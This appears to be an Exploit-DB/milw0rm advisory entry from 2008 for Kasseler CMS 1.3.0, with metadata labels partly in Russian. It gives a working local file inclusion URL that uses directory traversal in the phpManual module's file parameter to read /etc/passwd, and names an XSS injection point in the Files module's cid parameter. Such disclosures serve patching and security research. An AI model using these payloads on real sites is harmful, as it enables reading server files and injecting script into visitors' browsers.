Exploit Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting

[Exploiter]

EDB-ID

6007

Проверка EDB

1. Пройдено

Автор

CR@ZY_KING

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-3088 cve-2008-3087

Дата публикации

2008-07-05

Cr@zy_King / sqL L0v3r'Z Crew Co. 2008 // From Turkey

http://biyosecurity.com / If there isn't the devotion Success there... : )

Greatz : aLL my Friend'z

Kasseler-Cms (LFI/XSS) Multiple Remote Vulnerabilities

Down : http://www.kasseler-cms.net

LFI : http://127.0.0.1/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd

Xss : http://127.0.0.1/http://www.kasseler-cms.net/index.php?module=Files&do=Category&cid=[XSS] 

# milw0rm.com [2008-07-05]